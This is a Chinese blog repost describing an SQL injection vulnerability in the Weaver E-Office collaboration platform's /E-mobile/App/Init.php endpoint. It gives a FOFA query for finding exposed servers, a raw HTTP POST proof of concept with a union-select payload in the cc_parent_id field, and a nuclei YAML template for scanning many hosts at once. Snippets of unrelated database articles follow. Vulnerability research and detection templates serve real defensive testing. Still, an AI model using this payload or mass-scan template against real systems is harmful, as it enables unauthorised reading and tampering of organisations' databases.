首页 > 数据库 >泛微E-Office init.php SQL注入漏洞

泛微E-Office init.php SQL注入漏洞

时间:2023-10-21 14:24:10浏览次数:44  
标签:Office 漏洞 init SQL php 泛微 78.0

漏洞简介

泛微 E-Office 协同办公平台/E-mobile/App/Init.php接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改;

漏洞复现

fofa语法:app="泛微-EOffice"
登录页面如下:

POC:

POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 60
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#

nuclei批量yaml文件

id: fanwei_eoffice_init_sqli
info:
  name: 泛微 E-Office协同办公平台Init.php SQL注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |-
        POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
        Content-Length: 60
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate
        Connection: close

        cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words: 
          - CC_VALUE
      - type: word
        part: body
        words: 
          - CC_NAME
      - type: word
        part: header
        words:
          - '200'

标签:Office,漏洞,init,SQL,php,泛微,78.0
From: https://www.cnblogs.com/pursue-security/p/17778897.html

相关文章

  • PgSql - PostGIS 在 PostgreSQL 中使用
    首先来介绍一下PostGIS是什么?PostGIS是PostgreSQL对象关系数据库的一个空间数据库扩展。它增加了对地理对象的支持,允许在SQL中运行位置查询。官方介绍:PostGIS:SpatialandGeographicobjectsforPostgreSQLPostGISisaspatialdatabaseextenderforPostgreSQLobject......
  • 缺少几个'?'引起的WebSQL失效
    原来的数据库只有两列:english,chinese,       db.transaction(function (tx) {                tx.executeSql(                    'INSERT INTO USERS (english,chinese) VALUES (?,?)',              ......
  • mysqldump之where用法
    文档课题:mysqldump之where用法.数据库:MySQL5.7.21应用场景:实际生产中,需要运用mysqldump导出指定条件的数据,并且以insert语句的形式呈现,如下为相关测试.1、数据库信息mysql>select*fromstaffs;+----+------+-----+---------+---------------------+|id|name|age|p......
  • SQL语句的基本使用5-多值子查询
    SQL语句的基本使用5-多值子查询这个作业属于哪个课程https://edu.cnblogs.com/campus/uzz/cs3这个作业要求在哪里https://edu.cnblogs.com/campus/uzz/cs3/homework/13074这个作业的目标SQL语句的基本使用5-多值子查询1.在student_info表中查找与“刘东阳”性......
  • 1130 - Host 'xxx' is not allowed to connect to this MySQL server
    安装mysql-5.7.32数据库时,使用Navicat工具连接数据库时,出现Host'xxx'isnotallowedtoconnecttothisMySQLserver,详情如下: 两种解决方案,任选一个即可:1、修改mysql数据库用户表数据 执行如下SQL命令:usemysql;updateusersethost='%'whereuser......
  • MySQL学习(7)连接的原理
    什么是连接连接就是把各个表中的记录都取出来进行依次匹配。若无过滤条件,连接查询的结果集中包含一个表中的每一条记录与另一个表中的每一条记录相互匹配的组合,这样的结果集称为笛卡尔积。测试数据:CREATETABLEt1(m1INT,n1char(1));CREATETABLEt2(m2INT,n2char(1));......
  • 如何保障MySQL和Redis的数据一致性?
    先抛一下结论:在满足实时性的条件下,不存在两者完全保存一致的方案,只有最终一致性方案。根据网上的众多解决方案,总结出6种,直接看目录:  不好的方案 1、先写MySQL,再写Redis   如图所示: 这是一副时序图,描述请求的先后调用顺序; ......
  • 工具说明书 - DB Browser for SQLite
    https://blog.csdn.net/guoqx/article/details/121761216这里就要介绍一款,可以更加方便直接对SQLite的数据库操作的工具软件:DBBrowserforSQLite。 下载安装:Downloads-DBBrowserforSQLitehttps://sqlitebrowser.org/dl/ 下载64位安装版:DB.Browser.for.SQLite-3.12......
  • MySQL CASE()用法
    MySQL中的CASE表达式用于根据条件进行条件判断和返回多个可能的值。它允许在查询中执行简单的逻辑判断,并根据不同的条件返回不同的值或执行不同的操作。CASE表达式有两种形式:简单CASE和搜索CASE。简单CASE形式:CASEexpressionWHENvalue1THENresult1WHE......
  • MySQL IF()用法
    MySQL中的IF函数用于根据条件返回两个值中的一个。它可以应用于复杂查询和更新语句中,以便根据条件动态生成值。IF函数的语法如下:IF(condition,value_if_true,value_if_false)其中,condition是一个布尔表达式或一个返回布尔值的函数,value_if_true是条件为TRUE时返回......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99